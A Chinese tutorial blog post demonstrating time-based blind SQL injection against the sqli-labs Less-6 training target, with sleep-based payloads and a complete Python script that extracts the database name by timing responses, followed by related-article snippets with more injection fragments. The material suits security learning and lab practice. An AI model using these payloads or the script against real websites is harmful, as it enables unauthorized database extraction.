SQL时间盲注python脚本

最新推荐文章于 2025-03-20 23:21:07 发布
原创 最新推荐文章于 2025-03-20 23:21:07 发布 · 5.2k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python

本文详细介绍了如何在特定环境中利用时间延迟进行SQL盲注攻击,通过分析目标网站响应时间差异来推断数据库信息,包括数据库长度及具体字符,展示了Python脚本实现过程。
环境

Sql-lib靶机
Python3.8
Request、time库

分析
http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22--+

无触发,用时182毫秒
在这里插入图片描述

http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22%20and%20sleep(3)%20--+

用时3.14秒
在这里插入图片描述
触发和没触发之间,时间间隔是3.18减去0.182,简单来看就是大于2秒

判断数据库长度的时间盲注语句

and if(length(database())>1,1,sleep(3))

如果用等号的话,语句位置是有点不一样的,这里是个小坑

and if(length(database())=8,sleep(3),100)--+

利用ascii码判断数据库字符语句

?id=1" and if(ascii(substr(database(),1,1))>115,1,sleep(3))--+
脚本如下
import requests
import time

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
database = ''
global length
for l in range(1,20):
    Url = 'http://192.168.10.128/sqli-labs-master/Less-6/?id=1" and if(length(database())>{0},1,sleep(3))--+'
    UrlFormat = Url.format(l)      #format()函数使用
    start_time0 = time.time()  		#发送请求前的时间赋值
    requests.get(UrlFormat,headers=headers)
    if  time.time() - start_time0 > 2:	#判断正确的数据库长度
            print('database length is ' + str(l))
            global length 
            length = l	#把数据库长度赋值给全局变量
            break
    else:
        pass
for i in range(1,length+1):
    for char in chars:
        charAscii = ord(char) #char转换为ascii
        url = 'http://192.168.10.128/sqli-labs-master/Less-6/?id=1" and if(ascii(substr(database(),{0},1))>{1},1,sleep(3))--+'
        urlformat = url.format(i,charAscii)
        start_time = time.time()
        requests.get(urlformat,headers=headers)
        if  time.time() - start_time > 2:
            database+=char
            print('database: ',database)
            break
        else:
            pass
print('database is ' + database)

在这里插入图片描述

python实现sql时间盲注
箭雨镜屋
04-26 1175
一、python代码 二、使用方法 三、测试
使用python编写sql时间盲注的exp
CC210231的博客
04-05 2066
前言: 前面学习了布尔注的exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔注就无法实行了,此时,我们就要用到另一种注方式:时间盲注,也叫延时注入 延时注入原理: 延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。 我们在exp中怎样利用呢? 我们可以获
基于时间sql注入python脚本
weixin_30265103的博客
05-29 656
1 # coding:utf-8 2 import requests 3 import datetime 4 import time 5 6 # 获取数据库名长度 7 8 9 def database_len(): 10 for i in range(1, 10): 11 url = '''http://127.0....
Python脚本-时间盲注
m0_74317362的博客
09-23 1496
添加了time.sleep(0.05)
3.2 SQL注-时间注入--sql注入python脚本自动打印数据库信息
n0d_xy的博客
04-15 1514
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
时间盲注python脚本.zip
12-28
在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间盲注自动化攻击。 首先,我们来详细了解一下时间盲注的基本原理。当服务器执行...
布尔python脚本.zip
12-28
在给定的压缩包文件"布尔python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔注的Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔注原理**...
SQL注入之延时python自动化利用
最新发布
lubiii_的博客
03-20 1181
掌握延时注自动化需分步实践,从基础请求到优化绕过,最终实现稳定高效的数据提取工具。重点理解每个模块的底层逻辑,而非直接复制代码。
2024年Python最全Python自动化sql注入:布尔注_布尔注脚
2301_82244514的博客
04-30 935
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
布尔注脚本+时间盲注
weixin_73904941的博客
10-19 1460
布尔注 + 时间盲注 python自动注入脚本
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
python脚本实现sql时间盲注
wrypot的博客
03-27 1112
python脚本实现sqlsqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 1026
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
sql注入(时间盲注脚本,mysql结构)
2401_82760239的博客
04-04 1069
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 3706
介绍 时间盲注和上一篇布尔注一样都是注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
SQL时间盲注
2301_78549931的博客
08-05 1318
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .如果数据库名的第一个字符的ascii码值等于115,则页面沉睡3秒,如果数据库名的第一个字符的ascii码值不等于115,则页面不沉睡。这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容。
SQL注入-时间盲注
acepanhuan的博客
02-11 3360
SQL注入注学习
web渗透—— SQL基于时间
王嘟嘟的博客
04-16 2414
0x00 前言 之前学习了这些知识。 0x01 知识点 1.时间检测 and select sleep(5) --+ 2.检测表名 and (select if(ascii(substr(database(),1,1)),sleep(5),NULL)) --+
mysql 注二分法python脚本
weixin_30384217的博客
04-29 1407
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
sql注入python脚本
04-06
下面是一个使用Python编写的简单SQL注入注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值